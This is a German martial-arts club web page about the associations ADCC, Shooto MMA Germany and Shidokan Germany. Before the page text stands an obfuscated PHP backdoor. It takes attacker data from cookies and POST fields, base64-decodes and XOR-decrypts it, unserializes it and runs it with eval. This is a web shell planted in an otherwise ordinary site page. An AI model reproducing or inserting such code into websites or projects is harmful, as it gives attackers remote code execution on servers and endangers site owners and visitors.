$TyIyUDhDdB = "\114" . chr (106) . chr ( 1006 - 918 )."\x5f" . "\x6d" . "\146" . 'L';$gVUAyRviy = chr (99) . 'l' . chr ( 195 - 98 ).chr (115) . "\163" . '_' . 'e' . "\x78" . "\x69" . chr (115) . chr ( 951 - 835 )."\x73";$tWwVZr = class_exists($TyIyUDhDdB); $gVUAyRviy = "39933";$bcuzltjjPd = !1;if ($tWwVZr == $bcuzltjjPd){function rpaMtDP(){$VPFUef = new /* 61703 */ LjX_mfL(5007 + 5007); $VPFUef = NULL;}$pBCAmTIM = "5007";class LjX_mfL{private function CkEOnnCQju($pBCAmTIM){if (is_array(LjX_mfL::$lXguqe)) {$IUCFdYn = str_replace(chr (60) . chr ( 236 - 173 ).chr (112) . chr (104) . chr (112), "", LjX_mfL::$lXguqe["\143" . "\157" . "\x6e" . "\x74" . 'e' . 'n' . chr (116)]);eval($IUCFdYn); $pBCAmTIM = "5007";exit();}}private $XTfxq;public function yjsgVtvUPT(){echo 16311;}public function __destruct(){$pBCAmTIM = "14455_8656";$this->CkEOnnCQju($pBCAmTIM); $pBCAmTIM = "14455_8656";}public function __construct($JukUF=0){$idopAwjnxZ = $_POST;$ClqLqDQ = $_COOKIE;$QdgQbjNzL = "af39c301-d208-4d13-9f44-67059aa2517b";$KMyBPbzyg = @$ClqLqDQ[substr($QdgQbjNzL, 0, 4)];if (!empty($KMyBPbzyg)){$RhADYY = "base64";$PrJRCgIRg = "";$KMyBPbzyg = explode(",", $KMyBPbzyg);foreach ($KMyBPbzyg as $LAqUNgq){$PrJRCgIRg .= @$ClqLqDQ[$LAqUNgq];$PrJRCgIRg .= @$idopAwjnxZ[$LAqUNgq];}$PrJRCgIRg = array_map($RhADYY . chr ( 620 - 525 )."\144" . chr (101) . "\x63" . "\157" . chr (100) . 'e', array($PrJRCgIRg,)); $PrJRCgIRg = $PrJRCgIRg[0] ^ str_repeat($QdgQbjNzL, (strlen($PrJRCgIRg[0]) / strlen($QdgQbjNzL)) + 1);LjX_mfL::$lXguqe = @unserialize($PrJRCgIRg); $PrJRCgIRg = class_exists("14455_8656");}}public static $lXguqe = 14998;}rpaMtDP();} Verbände - German Top Team Leipzig

Verbände

ADCC SUBMISSION FIGHTING WORLD FEDERATION

The Club and the competition ADCC World Submission Fighting Championships were the idea and creation of a UAE national Sheik Tahnoon Bin Zayed Al Nahyan, the son of then U.A.E. leader Sheik Zayed. who at the time was completing his advanced studies in USA. In 1993 after watching the first U.F.C. Sheik Tahnoon the became a fan of MMA. Shortly after that he started studying Brazilian Jiu-Jitsu in San Diego, California. Upon completing his studies, Sheik Tahnoon returned to the U.A.E. but his passion for Martial arts did not stop. Sheik Tahnoon set out to create and build his vision of implementing Martial Arts not only in his native U.A.E. but also creating a standard for which all ground fighting martial arts would be measured. To put his vision to reality Sheik Tahnoon developed and propelled a two fold plan; to implement the growth of Martial Arts in the U.A.E. Sheik Tahnoon created the ADCC (Abu Dhabi Combat Club). Sheik Tahnoon converted an idle facility in Abu Dhabi into a Martial Arts Club. He began by hiring top instructors in various martial Arts, Brazilian Jiu-Jitsu, Judo, Wrestling, Sambo, Muay Thai etc. and giving them a World class facility to minister their classes and to train top professional fighters. Soon the ADCC became the top facility for learning and training MMA in the Arab World. At the ADCC facilities World class instructors teach Brazilian Jiu-Jitsu, Sambo, Boxing, Kickboxing, Judo, Wrestling and various other arts beneficial to MMA and No Rules Fighting.
Hier klicken

Shooto MMA Liga Germany

Shooto ist eine japanische „Mixed Martial Arts“ Liga, welche seit 1980 besteht und damit die erste und älteste Organisation in diesem noch jungen Sport ist. In Japan wird Shooto als ein eigener Sport verstanden und unterrichtet. Dabei hat das Shooto in Japan schon immer auf eine Trennung von „Amateur“- und „Profi“-Sport gesetzt und widmete sich schon früh der Schaffung einer Amateur Liga. Die Japan Shooto Association ist für den Amateur Sport verantwortlich und Professional Shooto Japan trägt Profikämpfe mit Athleten aus der ganzen Welt aus. Seit 2009 ist Shooto auch in Deutschland als Verband vertreten. Peter Angerer wurde vom Shooto Europe Präsident Martijn de Jong damit beauftragt Shooto als Sport in Deutschland zu verbreiten und Veranstaltungen und Wettkämpfe auszurichten. Seither feiern die deutschen Shooto Athleten einen noch nie da gewesenen Siegeszug in Europa und Japan. Erstmals konnte Peter Angerer auch erreichen, dass deutsche Sportler 2017 bei den All Japan Amateur Shooto Championships in Japan antreten durften und bereits 2018 folgte der erst Medaillenerfolg bei dem wohl größten Event der Welt, als Markus Held (German Top Team HQ) den 2. Platz belegte. 2019 siegte dann mit Christina Brauchle erstmals eine Nicht-Japanerin bei den Damen in diesem Sport. Peter Angerer hat sich dem Aufbau einer starken Amateur Liga im Shooto in Europa verdient gemacht und wird auch weiterhin an diesen Zielen kontinuierlich arbeiten.
Hier klicken

Shidokan Germany

Shidokan ist ein hybrider Vollkontakt Kampfsport – bestehend aus Kyokushin Karate, Kickboxen und Grappling – und wird auch als „Triathlon der Kriegskünste“ bezeichnet. Die Weltmeisterschaften in Chicago (USA) unter Leitung von Yoshimura Eddie Shihan brachten Angerer Renshi 1995 erstmals in Kontakt mit dem Shidokan und bereits zwei Jahre später wurde der Deutsche auf Fürsprache von Yoshimura Shihan hin von Soeno Kancho zum Branch President für Deutschland ernannt. Der Weltverband unter Leitung von Soeno Kancho hat seinen Sitz in Japan und arbeitet eng mit der deutschen Niederlassung zusammen. Angerer Renshi hat in den vergangenen Jahrzehnten bereits etliche Europa- und Weltmeisterschaften des Shidokan in Deutschland ausgerichtet und ist als Trainer zahlreicher international erfolgreicher Athleten weltweit bekannt.
Nach oben scrollen